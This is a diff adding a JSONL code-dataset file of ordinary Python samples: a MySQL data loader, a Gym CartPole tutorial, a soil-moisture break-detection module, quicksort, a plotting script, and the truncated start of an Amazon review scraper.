diff --git "a/4160.jsonl" "b/4160.jsonl" new file mode 100644--- /dev/null +++ "b/4160.jsonl" @@ -0,0 +1,701 @@ +{"seq_id":"167380444","text":"import json\nimport os\nimport MySQLdb\n\ndef main():\n config = CONFIG\n load_data(config)\n\ndef get_config():\n config_file = None\n path = os.path.dirname(os.path.realpath(__file__))\n try:\n config_file = open(file=\"{}/parameters/config.json\".format(path), mode=\"r\")\n config_str = config_file.read()\n config_json = json.loads(config_str)\n return config_json\n finally:\n if (config_file!=None):\n config_file.close()\n\ndef execute_query(config, table):\n connection = MySQLdb.connect(host=config[\"host\"], user=config[\"user\"], passwd='')\n path = os.path.dirname(os.path.realpath(__file__))\n cursor = connection.cursor()\n query = \"LOAD DATA LOCAL INFILE \" \\\n \"'{}/landing/{}.tbl' \" \\\n \"INTO TABLE {}.{} FIELDS TERMINATED BY '|'\".format(path, table, config['database'], table)\n try:\n try:\n cursor.execute(query)\n connection.commit()\n except (MySQLdb.Error, MySQLdb.Warning) as e:\n print(e)\n return None\n finally:\n connection.close()\n\ndef load_data(config):\n for table in config['tables']:\n print(\"loading \" + table + \" table \")\n execute_query(config, table)\n\nCONFIG = get_config()\n\nif __name__ == \"__main__\":\n main()","sub_path":"dinesh_solution/initial_load.py","file_name":"initial_load.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"100480446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 28 18:25:59 2018\r\n\r\n@author: Junaid.raza\r\n\"\"\"\r\n\r\n\"\"\"\r\nRinforcment Learnign is about a men, machine or a neural net to learning to navigate an\r\nuncertain environment with the goal of maximizing numerical reward.\r\nSports is the best examples. Where your action changes the status of your game.\r\nEach action is completed for a reward (0,1) \r\nHave to follow the policy or rule to maximze the score.\r\n\r\nThere is an Agent.\r\nAgent have an Environmnent.\r\nAgent knows the State (S) of Environment.\r\nAgent takes any Action (A).\r\nEnvironment updates with new State (S) and some Reward (R) in form of Binary (0,1).\r\n\r\nAgent doesnt know about Environment. He is just experiencing the environment by actions , state and reward.\r\n\r\nGym is a toolkit for developing and comparing reinforcement learning algorithms.\r\n\"\"\"\r\nimport gym\r\n\r\n\"\"\"\r\nHere’s a bare minimum example of getting something running. This will run an \r\ninstance of the CartPole-v0 environment for 1000 timesteps, rendering the environment \r\nat each step. You should see a window pop up rendering the classic cart-pole problem:\r\n\r\n\"\"\"\r\n#This code is to test first form of our algorithm\r\n#UnComment these four lines to see first shape and comment the below code\r\n#env = gym.make('CartPole-v0')\r\n#env.reset()\r\n#for _ in range(1000):\r\n# env.render()\r\n# env.step(env.action_space.sample()) # take a random action\r\n \r\n \r\nenv = gym.make('CartPole-v0')\r\nfor i_episode in range(20):\r\n observation = env.reset()\r\n for t in range(100):\r\n env.render()\r\n print(observation)\r\n action = env.action_space.sample()\r\n observation, reward, done, info = env.step(action)\r\n if done:\r\n print(\"Episode finished after {} timesteps\".format(t+1))\r\n break\r\n\r\n\"\"\"\r\ntry replacing CartPole-v0 above with something like MountainCar-v0, \r\nMsPacman-v0 (requires the Atari dependency), or Hopper-v1 (requires the MuJoCo dependencies). \r\n\"\"\"\r\n\r\n\"\"\"\r\nIf we ever want to do better than take random actions at each step, \r\nit’d probably be good to actually know what our actions are doing to the environment.\r\n\r\nThe environment’s step function returns exactly what we need. In fact, step returns \r\nfour values. These are:\r\n \r\n observation (object): \r\n an environment-specific object representing your observation of the environment. \r\n For example, pixel data from a camera, joint angles and joint velocities of a robot, \r\n or the board state in a board game.\r\n reward (float): \r\n amount of reward achieved by the previous action. The scale varies between \r\n environments, but the goal is always to increase your total reward\r\n done (boolean): \r\n whether it’s time to reset the environment again. Most (but not all) \r\n tasks are divided up into well-defined episodes, and done being True indicates the \r\n episode has terminated. (For example, perhaps the pole tipped too far, or you lost \r\n your last life.)\r\n info (dict): \r\n diagnostic information useful for debugging. It can sometimes be useful for \r\n learning (for example, it might contain the raw probabilities behind the \r\n environment’s last state change). However, official evaluations of your agent \r\n are not allowed to use this for learning.\r\n \r\n \r\nSpaces\r\nIn the examples above, we’ve been sampling random actions from the environment’s \r\naction space. But what actually are those actions? Every environment comes with an \r\naction_space and an observation_space. These attributes are of type Space, and they \r\ndescribe the format of valid actions and observations:\r\n \r\n import gym\r\n env = gym.make('CartPole-v0')\r\n print(env.action_space)\r\n #> Discrete(2)\r\n print(env.observation_space)\r\n #> Box(4,)\r\n \r\nThe Discrete space allows a fixed range of non-negative numbers, so in this case \r\nvalid actions are either 0 or 1. The Box space represents an n-dimensional box, so \r\nvalid observations will be an array of 4 numbers. We can also check the Box’s bounds:\r\n \r\n print(env.observation_space.high)\r\n #> array([ 2.4 , inf, 0.20943951, inf])\r\n print(env.observation_space.low)\r\n #> array([-2.4 , -inf, -0.20943951, -inf])\r\n \r\nThis introspection can be helpful to write generic code that works for many different \r\nenvironments. Box and Discrete are the most common Spaces. You can sample from a Space \r\nor check that something belongs to it:\r\n \r\n from gym import spaces\r\n space = spaces.Discrete(8) # Set with 8 elements {0, 1, 2, ..., 7}\r\n x = space.sample()\r\n assert space.contains(x)\r\n assert space.n == 8\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Reinforcement Learning/Reinforcement_Learning.py","file_name":"Reinforcement_Learning.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"413427033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 07 13:46:17 2016\n\n@author: wpreimes\n\"\"\"\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nfrom typing import Union\nfrom pytesmo.time_series.anomaly import calc_anomaly\nfrom collections import Counter\nfrom datetime import datetime\n\nfrom scipy.stats import fligner, levene\nfrom ccibreakadjustment.cci_timeframes import CCITimes\nfrom ccibreakadjustment.otherfunctions import regress, datetime2matlabdn\nfrom ccibreakadjustment.import_satellite_data import QDEGdata_D\nfrom ccibreakadjustment.import_ismn_data import ISMNdata\n\nwarnings.simplefilter(action=\"ignore\", category=RuntimeWarning)\n\n\nclass BreakTestData(object):\n '''\n Class containing properties of data used for break detection\n '''\n def __init__(self, test_prod, ref_prod, anomaly):\n # type: (str,str,Union(bool,str)) -> None\n '''\n :param test_prod: str\n Name of the product as in QDEGdata to test for breaks against the reference\n e.g for CCI: CCI_*version*_*PRODUCT*\n :param ref_prod: str\n Name of the reference product as in QDEGdata\n e.g merra2\n :param anomaly: bool\n Set True to use anomaly data for testing\n '''\n self.ref_prod = ref_prod\n self.test_prod = test_prod\n self.range = CCITimes(self.test_prod, ignore_position=True).get_times(None, as_datetime=False)['ranges']\n self.anomaly = anomaly\n if self.ref_prod == 'ISMN-Merge':\n self.ismndata = ISMNdata(None, max_depth=0.1)\n self.data = QDEGdata_D(products=[self.test_prod])\n else:\n self.data = QDEGdata_D(products=[self.ref_prod, self.test_prod])\n\n\n def read_gpi(self, gpi, start=None, end=None):\n '''\n Read time series for the class products from start date to end date\n\n :param gpi: int\n index of ground point for which data is read\n :param start: string (%Y-%m-%d)\n Start date of the time series to read\n :param end: string (%Y-%m-%d)\n End date of the time series to read\n :return: pd.DataFrame\n DataFrame of SM values of the test product and ref product\n '''\n\n # Import the test data and reference datasets for the active ground point\n if not start:\n start = self.range[0]\n if not end:\n end = self.range[1]\n\n if self.anomaly == 'ccirange':\n # Calculate the anomaly over the whole CCI version time frame (1978-present)\n range = [time.strftime('%Y-%m-%d') for time in self.range]\n try:\n df_time = (self.data).read_gpi(gpi, range[0], range[1])\n df_time = df_time / 100 # type: pd.DataFrame\n\n df_time[self.ref_prod] = calc_anomaly(df_time[self.ref_prod])\n df_time[self.test_prod] = calc_anomaly(df_time[self.test_prod])\n except:\n raise Exception('9: Could not import data for gpi %i' % gpi)\n\n if self.ref_prod == 'ISMN-Merge':\n print('CCI range anomaly wont work with ISMN data')\n\n else:\n try:\n if self.ref_prod == 'ISMN-Merge':\n df_time = self.data.read_gpi(gpi, start, end)\n df_time['ISMN-Merge'] = self.ismndata.read_gpi(gpi, start, end)\n df_time = df_time / 100 # type: pd.DataFrame\n else:\n df_time = self.data.read_gpi(gpi, start, end)\n df_time = df_time / 100\n\n if self.anomaly == 'timeframe':\n df_time[self.ref_prod] = calc_anomaly(df_time[self.ref_prod])\n df_time[self.test_prod] = calc_anomaly(df_time[self.test_prod])\n except:\n raise Exception('9: Could not import data for gpi %i' % gpi)\n\n df_time = df_time.rename(columns={self.ref_prod: 'refdata_original',\n self.test_prod: 'testdata_original'})\n\n # Drop days where either dataset is missing\n return df_time\n\n def group_by_breaktime(self, df_time_in, breaktime, min_data_size, ignore_exception=False):\n '''\n Divide Time Series into 2 subgroups according to breaktime (before/after)\n\n :param df_time: pd.DataFrame\n :param breaktime: datetime\n :return: pd.DataFrame\n '''\n df_time = df_time_in.copy()\n df_time['group'] = np.nan\n\n i1 = df_time.loc[:breaktime]\n i2 = df_time.loc[breaktime + pd.DateOffset(1):]\n\n df_time.loc[i1.index, 'group'] = 0\n df_time.loc[i2.index, 'group'] = 1\n ni1 = len(i1.index)\n ni2 = len(i2.index)\n\n # Check if group data sizes are above selected minimum size\n if not ignore_exception:\n if ni1 < min_data_size or ni2 < min_data_size:\n raise Exception('4: Minimum Dataseries Length not reached. Size is %i and/or %i !> %i'\n % (ni1, ni2, min_data_size))\n\n return df_time, ni1, ni2\n\n @staticmethod\n def temp_resample(df_in, how='M', threshold=None):\n '''\n Resample a dataframe to monthly values, if the number of valid values (not nans) in a month\n is smaller than the defined threshold, the monthly resample will be NaN\n\n :param how: str\n Time frame for temporal resampling, M = monthly, 10D = 10daily,...\n :param threshold: float\n % of valid days (not nan) in timeframe defined in 'how'\n :return: pd.DataFrame\n The monthly resampled Data\n '''\n df = df_in.copy()\n\n if 'refdata' in df.columns:\n #TODO: Move this outside the function\n # Check if any data is left for testdata and reference data\n if df.isnull().all().refdata or df.isnull().all().testdata:\n raise Exception('2: No data for the selected timeframe')\n if not threshold:\n return df.resample(how).mean()\n else:\n if how != 'M':\n raise NotImplementedError\n\n years, months = df.index.year, df.index.month\n\n if len(years)==0 or len(months)==0:\n return None\n\n startday = datetime(years[0], months[0], 1)\n last_year, last_month = years[-1], months[-1]\n\n if last_month == 12:\n next_month, next_year = 1 , last_year + 1\n else:\n next_month, next_year = last_month + 1, last_year\n\n days_last_month = (datetime(next_year, next_month, 1) - datetime(last_year, last_month, 1)).days\n endday = datetime(last_year, last_month, days_last_month)\n\n index_full = pd.DatetimeIndex(start=startday, end = endday, freq = 'D')\n df_alldays = pd.DataFrame(index=index_full,\n data = {'count_should' : 1}).resample(how).sum()\n\n df_mean = df.resample(how).mean()\n df['count'] = 1\n df_mean['count_is'] = df[['count']].resample(how).sum()\n df_mean['count_should'] = df_alldays['count_should'] * threshold\n\n df_filtered = df_mean.loc[df_mean['count_is'] >= df_mean['count_should']]\n\n return df_filtered.drop(['count_should', 'count_is'], axis=1), df_filtered[['count_should', 'count_is']]\n\n\n def ref_data_correction(self, df_time, refdata_col_name, ignore_exceptions=False):\n '''\n Scale the column \"refdata\" in the given dataframe to values of \"testdata\" in the dataframe\n\n :param df_time: pd.DataFrame\n SM values, columns must be named 'refdata' and 'testdata'\n :return: pd.DataFrame\n DataFrame with bias corrected reference data\n '''\n data = df_time.copy()\n adjusted_data, rxy, pval, ress = regress(data, refdata_col_name)\n\n data['bias_corr_refdata'] = adjusted_data\n\n if not ignore_exceptions and any(np.isnan(ress)):\n raise Exception('5: Negative or NaN correlation after refdata correction')\n\n return data['bias_corr_refdata']\n\n\nclass BreakTestBase(BreakTestData):\n '''\n Class containing functions and properties for relative homogeneity testing\n '''\n def __init__(self, gpi, test_prod, ref_prod, tests, alpha, anomaly,\n refdata_correction_for = 'timeframe'):\n # type: (int,str,str,dict,float,Union(bool,str)) -> None\n '''\n :param test_prod: str\n as in BreakTestData\n :param ref_prod: str\n as in BreakTestData\n :param tests: dict\n dictionary of test types and test names as implemented in self.run_tests()\n eg. {'mean':wilkoxon, 'var':'scipy_fligner_killeen'}\n :param alpha: float\n significance level for all tests\n :param anomaly: str\n as in BreakTestData\n '''\n\n BreakTestData.__init__(self, test_prod, ref_prod, anomaly)\n self.tests = tests\n self.fligner_approx = 'chi' #TODO: defined by user, implement fisher\n self.alpha = alpha\n self.ref_data_correction_for = refdata_correction_for\n self.temp_resample_to = 'M'\n self.threshold_for_temp_resample =0.3\n self.tf_min_corr_pval = (0, 0.05)\n self.min_data_size = 5\n\n\n try: # load testdata and reference data\n self.df_time = self.read_gpi(gpi, self.range[0], self.range[1])\n self.df_time['testdata'] = self.df_time['testdata_original'].copy(deep=True)\n self.df_time['testdata_RAW'] = self.df_time['testdata_original'].copy(deep=True)\n except:\n if process_logs: process_log.add_line('ERROR: loading data failed', 1)\n continue\n\n self.df_tf = None\n\n if process_logs: process_log.add_line('reference data bias correction', 1)\n corrected_refdata = test_obj.ref_data_correction(df_time.loc[:, ['testdata', 'refdata_original']],\n 'refdata_original',\n ignore_exceptions=True)\n df_time.loc[:, 'refdata_original'] = corrected_refdata\n\n times = times_obj.get_times(gpi, as_datetime=True)\n timeframes, breaktimes = times['timeframes'], times['breaktimes']\n\n\n def difference_ts(self):\n return self.df_tf['testdata'] - self.df_tf['refdata']\n\n\n def select_timeframe(self, timeframe, breaktime):\n # Select subset\n # Perform biascorrection\n # Goup\n self.df_tf = self.data[timeframe[0]:timeframe[1]].copy()\n if self.ref_data_correction_for == 'timeframe':\n self.df_tf = self.ref_data_correction(self.df_tf, 'refdata')\n self.df_tf = self.temp_resample(self.df_tf, self.temp_resample_to, self.threshold_for_temp_resample)\n corr, pval = self.check_corr(self.df_tf, self.tf_min_corr_pval[0], self.tf_min_corr_pval[1])\n self.df_tf['Q'] = self.difference_ts()\n self.df_tf = self.group_by_breaktime(self.df_tf,\n breaktime,\n self.min_data_size)\n\n\n def get_testresults(self):\n return self.testresults\n\n def check_testresult(self, testresult):\n '''\n Checks if all tests are negative (no break)\n\n :param testresult: dict\n test results as returned by run_tests\n :return: bool\n '''\n test_h = {test: testresult['h_%s' % test] for test in self.tests.values()}\n if all([h == 0 for h in test_h.values()]):\n return None, None, False\n else:\n break_found_by = []\n failed_tests = []\n for test in self.tests.values():\n if test_h[test] == 1:\n break_found_by.append(test)\n elif test_h[test] == 99:\n failed_tests.append(test)\n\n has_break = True if break_found_by else False\n\n return failed_tests if failed_tests else None, \\\n break_found_by if break_found_by else None, \\\n has_break\n\n def compare_testresults(self, reference_result, last_result, priority='mean'):\n ref_tests_failed, ref_found_by, ref_has_break = self.check_testresult(reference_result)\n last_tests_failed, last_found_by, last_has_break = self.check_testresult(last_result)\n\n if ref_has_break and not last_has_break:\n # Break was removed --> better\n return True\n elif ref_has_break and last_has_break:\n # Both found break, use priority to decide\n # compare tests\n if Counter(ref_found_by) == Counter(last_found_by): # Same tests found break\n return False # nothing improved --> worse\n elif priority:\n for p in priority:\n if (self.tests[p] in ref_found_by) and (self.tests[p] not in last_found_by):\n return True # --> Priority was removed, other might have been added\n else:\n continue # Move to next Priority\n return False # --> Priority was not removed\n else:\n return False # --> no priority defined\n\n\n @staticmethod\n def wk_test(dataframe, alternative='two-sided', alpha=0.01):\n # type: (pd.DataFrame, str) -> (float,dict)\n\n U_wk, p_wk = stats.mannwhitneyu(dataframe['Q'].loc[dataframe['group'] == 0],\n dataframe['Q'].loc[dataframe['group'] == 1],\n alternative=alternative)\n stats_wk = stats.ranksums(dataframe['Q'].loc[dataframe['group'] == 0],\n dataframe['Q'].loc[dataframe['group'] == 1])[0] # type: dict\n\n\n\n if p_wk < alpha:\n h = 1\n else:\n h = 0\n\n return h, {'zval': stats_wk, 'pval': p_wk}\n\n @staticmethod\n def fk_test(dataframe_in, mode='median', alpha=0.01):\n # type: (pd.DataFrame, str, float) -> (int,dict)\n '''\n FKTEST Fligner-Killeen test for homogeneity of variances.\n\n Trujillo-Ortiz, A., R. Hernandez-Walls and N. Castro-Castro. (2009).FKtest:\n Fligner-Killeen test for homogeneity of variances. A MATLAB file. [WWW document].\n URL http://www.mathworks.com/matlabcentral/fileexchange/25040\n\n Input data format:\n Dataframe: 2 columns\n column1 (data): difference data Q column2 (group): group number (1 or 2 für reference data or testdata)\n '''\n\n # number of measurements and datagroups\n dataframe = dataframe_in.copy()\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n N = df.index.size\n K = df['group'].nunique()\n\n df['A'] = np.nan\n\n if mode == 'median':\n for i in range(K):\n subset = df.ix[df['group'] == i]\n groupmed = subset.data.median()\n df.ix[df['group'] == i, 'groupmed'] = groupmed # group medians\n df.ix[df['group'] == i, 'groupme_diff'] = np.abs(\n subset['data'] - groupmed) # difference data-groupmedians\n\n if mode == 'mean':\n for i in range(K):\n subset = df.ix[df['group'] == i]\n groupmean = subset.data.mean()\n df.ix[df['group'] == i, 'groupmean'] = groupmean # groupmeans\n df.ix[df['group'] == i, 'groupme_diff'] = np.abs(\n subset['data'] - groupmean) # difference data-groupmeans\n\n Z = stats.rankdata(df['groupme_diff']) # score ranking ALL\n sta_norm_dist = stats.norm.ppf(0.5 + (Z / (2. * (N + 1.)))) # score standard normal distribution ALL\n df['A'] = sta_norm_dist\n M = df['A'].mean() # overall mean\n\n nn = []\n mm = []\n bb = []\n for i in range(K):\n subset = df.ix[df['group'] == i]\n\n nn.append(subset.index.size)\n mm.append(np.mean(subset['A']))\n df.ix[df['group'] == i, 'groupAmean'] = mm[i]\n bb.append((nn[i] * (mm[i] - M) ** 2))\n df.ix[df['group'] == i, 'groupB'] = bb[i]\n\n B = np.array(df['groupB'].unique())\n V = df['A'].var() # Overall Variance Score\n X2 = np.sum(B) / V # Fligner-Killeen statistic by the Chi-squared approximation\n v = K - 1 # statistic degree of freedom\n F = (X2 / v) / ((N - 1. - X2) / (N - K)) # Fligner-Killeen statistic by the Fisher approximation\n\n P1 = 1 - stats.chi2.cdf(X2, v)\n P2 = 1 - stats.f.cdf(F, v, N - K)\n\n # TODO: Laut Chun-Hsu statt F X2??\n stats_fk = {'chi': {'z': X2, 'df': v, 'pval': P1}, 'f': {'z': F, 'df': [v, N - K], 'pval': P2}}\n\n if stats_fk['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n\n return h, stats_fk\n\n @staticmethod\n def scipy_fk_test(dataframe, mode='median', alpha=0.1):\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n sample1 = df[df['group'] == 0.]['data'].values\n sample2 = df[df['group'] == 1.]['data'].values\n\n stats, pval = fligner(sample1, sample2, center=mode)\n\n stats_fk = {'chi': {'z': stats, 'pval': pval}}\n\n if stats_fk['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n return h, stats_fk\n\n @staticmethod\n def lv_test(dataframe, mode='median', alpha=0.1):\n #TODO: Not tested\n df = dataframe.rename(columns={'Q': 'data'})\n df = df.dropna()\n sample1 = df[df['group' == 0.].index]['Q'].values\n sample2 = df[df['group' == 1.].index]['Q'].values\n\n stats, pval = levene(sample1, sample2, center=mode)\n\n stats_lv = {'chi': {'z': stats, 'pval': pval}}\n\n if stats_lv['chi']['pval'] < alpha:\n h = 1\n else:\n h = 0\n return h, stats_lv\n\n def check_corr(self, df_time, min_corr=0, min_p = 0.05):\n # Calculation of Spearman-Correlation coefficient\n corr, pval = stats.spearmanr(df_time['testdata'], df_time['refdata'], nan_policy='omit')\n\n # Check the rank correlation so that correlation is positive and significant\n if not (corr > min_corr and pval < min_p): # TODO: stricter thresholds?\n raise Exception('3: Spearman correlation failed with correlation %f ' \n '(must be >0) and pval %f (must be <0.05)' % (corr, pval))\n\n return corr, pval\n\n def restructure_test_results(self, test_results):\n # type: (dict) -> dict\n\n restructured_results = {}\n\n for test in self.tests.values():\n restructured_results['h_%s' % test] = test_results[test]['h']\n if np.isnan(restructured_results['h_%s' % test]): continue\n if self.fligner_approx in test_results[test]['stats'].keys():\n stats = test_results[test]['stats'][self.fligner_approx]\n restructured_results['z_%s' % test] = stats['z']\n else:\n stats = test_results[test]['stats']\n restructured_results['p_%s' % test] = stats['pval']\n\n test_status = 1 # '1: Testing successful'\n\n if 'mean' in self.tests.keys():\n mean_test_result = restructured_results['h_%s' % self.tests['mean']]\n if np.isnan(mean_test_result):\n test_status = 6 # '6: WK was selected but failed.'\n restructured_results['h_%s' % self.tests['mean']] = np.nan\n else:\n mean_test_result = np.nan\n if 'var' in self.tests.keys():\n var_test_result = restructured_results['h_%s' % self.tests['var']]\n if np.isnan(var_test_result):\n test_status = 7 # '7: FK was selected but failed.'\n restructured_results['h_%s' % self.tests['var']] = np.nan\n else:\n var_test_result = np.nan\n\n # Combine results to single value\n #TODO: Do this when plotting data\n if mean_test_result == 1:\n if var_test_result == 1:\n all = 3.0\n else:\n all = 1.0\n elif var_test_result == 1:\n all = 2.0\n else:\n all = 4.0\n\n restructured_results.update({'test_results': all, 'test_status': test_status})\n\n return restructured_results\n\n def run_tests(self, data):\n # type: (pd.DataFrame, list) -> (pd.DataFrame, dict)\n '''\n Prepares Data for Testing. Bias Correction of Reference Data. Analyzes data sufficiency.\n :param data:\n :param breaktime:\n :param min_data_size:\n :return:\n '''\n tests = self.tests.values()\n testresults = {}\n\n # Wilcoxon rank sum test\n if 'wilkoxon' in tests:\n try:\n h_wk, stats_wk = self.wk_test(data, 'two-sided')\n wilkoxon = {'h': h_wk, 'stats': stats_wk}\n except:\n wilkoxon = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['wilkoxon'] = wilkoxon\n if 'fligner_killeen' in tests:\n try:\n h_fk, stats_fk = self.fk_test(data[['Q', 'group']], mode='median', alpha=self.alpha)\n fligner_killeen = {'h': h_fk, 'stats': stats_fk}\n except:\n fligner_killeen = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['fligner_killeen'] = fligner_killeen\n if 'scipy_fligner_killeen' in tests:\n try:\n h_fk, stats_fk = self.scipy_fk_test(data[['Q', 'group']], mode='median', alpha=self.alpha)\n fligner_killeen = {'h': h_fk, 'stats': stats_fk}\n except:\n fligner_killeen = {'h': np.nan, 'stats': np.nan}\n pass\n testresults['scipy_fligner_killeen'] = fligner_killeen\n\n self.testresults = self.restructure_test_results(testresults)\n\n return self.testresults\n\n\ndef get_test_meta():\n results_meta = {'1' : 'WK only',\n '2' : 'FK only',\n '3' : 'WK and FK',\n '4' : 'None'}\n status_meta = {'0' : 'Not tested (initial)',\n '1' : 'Testing successful',\n '2' : 'No data for the selected timeframe',\n '3' : 'Spearman correlation too low',\n '4' : 'Min. Dataseries len. not reached',\n '5' : 'neg/nan correl. aft. bias corr.',\n '6' : 'WK was selected but failed',\n '7' : 'FK was selected but failed',\n '8' : 'WK test and FK test failed',\n '9' : 'Could not import data for gpi'}\n\n return results_meta, status_meta\n\n","sub_path":"ccibreakadjustment/trash/old_break_detection_interface.py","file_name":"old_break_detection_interface.py","file_ext":"py","file_size_in_byte":22848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539543695","text":"# -*- coding: utf-8 -*-\n#Divide and conquer\n#1. Divide: Partition array into 2 subarrays around pivot x,\n#such that elements in lower subarray <= x <= elements in upper subarray\n#2. Conquer: Recursively sort 2 subarrays\n#3. Combine: Trivial\n\nimport random\n\ndef partition(array, start, end):\n\n pivot = array[start]\n l = start\n for i in range(start+1, end+1):\n if array[i] <= pivot:\n l = l + 1\n array[i], array[l] = array[l], array[i]\n array[start], array[l] = array[l], array[start]\n\n return l\n\ndef quicksort(array, start, end):\n\n if end > start:\n mid = partition(array, start, end)\n quicksort(array, start, mid-1)\n quicksort(array, mid+1, end)\n\ndef quicksortRandimize(array, start, end):\n #Running time is independent of input ordering\n #No assumption about input distribution\n #No specific input elicit worst behavior\n #Worst case determined only by random number generator\n if end > start:\n mid = partitionRandimize(array, start, end)\n quicksort(array, start, mid-1)\n quicksort(array, mid+1, end)\n\ndef partitionRandimize(array, start, end):\n r = random.randint(start, end)\n array[r], array[start] = array[start], array[r]\n pivot = array[start]\n l = start\n for i in range(start+1, end+1):\n if array[i] <= pivot:\n l = l + 1\n array[i], array[l] = array[l], array[i]\n array[start], array[l] = array[l], array[start]\n\n return l\n\nalist = random.sample(range(1,10000),100)\nquicksort(alist, 0, len(alist)-1)\nprint(alist)\n\nalistr = random.sample(range(1,10000),100)\nquicksortRandimize(alistr, 0, len(alistr)-1)\nprint(alistr)","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"87244127","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 8 19:57:02 2020\r\n\r\n@author: Ching Hoe Lee\r\n\"\"\"\r\n\r\nimport scipy as sp\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndata=np.loadtxt('taskiie.csv',delimiter=',')\r\nunique_h_list=[]\r\ncounts_h_list=[]\r\nL=np.array([4,8,16,32,64,128,256])\r\nstd_height=np.std(data,axis=1)\r\nfor i in data:\r\n unique_h,counts_h=np.unique(i,return_counts=True)\r\n unique_h_list.append(unique_h)\r\n counts_h_list.append(counts_h)\r\nscale_y_list=[]\r\nj=0\r\nwhile j <=6:\r\n x=unique_h_list[j]\r\n y=counts_h_list[j]/100000\r\n scale_y=np.std(unique_h_list[j])*counts_h_list[j]/100000\r\n scale_y_list.append(scale_y)\r\n plt.plot(x, y, label=f'L={L[j]}')\r\n j+=1\r\nplt.legend()\r\nplt.ylabel('probability')\r\nplt.xlabel('height')\r\nplt.savefig('probability.png')\r\nplt.figure()\r\n\r\nk=0\r\nwhile k<=6:\r\n new_y=scale_y_list[k]\r\n quan=unique_h_list[k]-np.mean(unique_h_list[k])\r\n new_x=quan*(np.std(unique_h_list[k]))**(-1)\r\n plt.plot(new_x,new_y,label=f'L={L[k]}')\r\n plt.legend()\r\n plt.savefig('datacollapse.png')\r\n k+=1\r\n\r\nplt.legend()\r\nplt.show()","sub_path":"pretask2g.py","file_name":"pretask2g.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"33785909","text":"\"\"\"Scraper extracts data from raw HTML and creates corresponding objects.\"\"\"\nimport models\nimport bs4\nimport datetime\nimport re\n\nnum_format = '(\\d+(?:\\,\\d{3})*)'\n\n\ndef _get_date(date_str):\n \"\"\"\n Attempts to parse a valid time using Amazon's format\n :param time_str: a string to parse\n :return: A valid datetime, or None if the conversion was invalid\n \"\"\"\n re.sub(' (\\d) ', ' 0{} ', date_str)\n try:\n return datetime.datetime.strptime(date_str, '%B %d, %Y')\n except ValueError:\n return None\n\n\ndef _select(element, query, important=True):\n result = element.select_one(query)\n if result is None and important:\n raise Exception('Element not found: {}'.format(query))\n return result\n\n\ndef _select_all(element, query, important=True):\n results = element.select(query)\n if results is [] and important:\n raise Exception('Element not found: {}'.format(query))\n return results\n\n\ndef _find(element, important=True, **kwargs):\n result = element.find(**kwargs)\n if result is None and important:\n raise Exception('Element not found: {}'.format(kwargs))\n return result\n\n\ndef _find_all(element, important=True, **kwargs):\n results = element.find_all(**kwargs)\n if results is [] and important:\n raise Exception('Element not found: {}'.format(kwargs))\n return results\n\n\ndef get_reviews_url(html):\n \"\"\"\n Gets the URL of a product's reviews\n :param html: The HTML of the product's review iFrame\n :return: The URL of the product's reviews\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n return _select(dom, '.crIframeReviewList span.small > b > a')['href']\n\n\ndef get_amazon_rating(html):\n \"\"\"\n Gets the amazon rating of a product\n :param html: A string containing the html of a product ratings page\n :return: The amazon rating of a product as a double\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n return float(_select(dom, '.arp-rating-out-of-text').text[:3])\n\n\ndef get_page_count(html):\n \"\"\"\n Gets the number of review pages belonging to a product\n :param html: A string containing the html of a product ratings page\n :return: Number of pages as an int\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n page_buttons = _select_all(dom, '.page-button', important=False)\n if page_buttons:\n return int(page_buttons.pop().text)\n else:\n return 1\n\n\ndef get_review_url_list(html):\n \"\"\"\n Returns a list of URLs that link to amazon reviews\n :param html: A string containing the html of a product ratings page\n :return: A list of URL strings\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n titles = _select_all(dom, 'a.review-title')\n return ['http://www.amazon.com{}'.format(title['href']) for title in titles]\n\n\ndef get_review(html):\n \"\"\"\n Parses a review object based on an html string\n :param html: A string containing the html of a reviewer page\n :return: A parsed reviewer object\n \"\"\"\n review = models.Review()\n dom = bs4.BeautifulSoup(html, 'html.parser')\n # parse the 'hReview' element that contains several needed pieces of data\n review.text = _select(dom, '.reviewText').text\n review.verified = _select(dom, '.verifyWhatsThis', important=False) is not None\n dates = [_get_date(tag.text) for tag in _select_all(dom, 'nobr')]\n review.timestamp = filter(None, dates)[0]\n\n reviewer_element = _select(dom, '.hReview .reviewer .url')\n review.reviewer_url = 'http://www.amazon.com{}'.format(reviewer_element['href'])\n vote_text = _select(dom, '.reviewText').parent.find('div', text=re.compile('^\\s+{0} of {0} .+'.format(num_format)))\n\n if vote_text:\n up, total = re.findall(re.compile(num_format), vote_text.text)\n review.upvote_count = int(up)\n review.downvote_count = int(total) - int(up)\n else:\n review.upvote_count = review.downvote_count = 0\n\n rating_text = _find(dom, 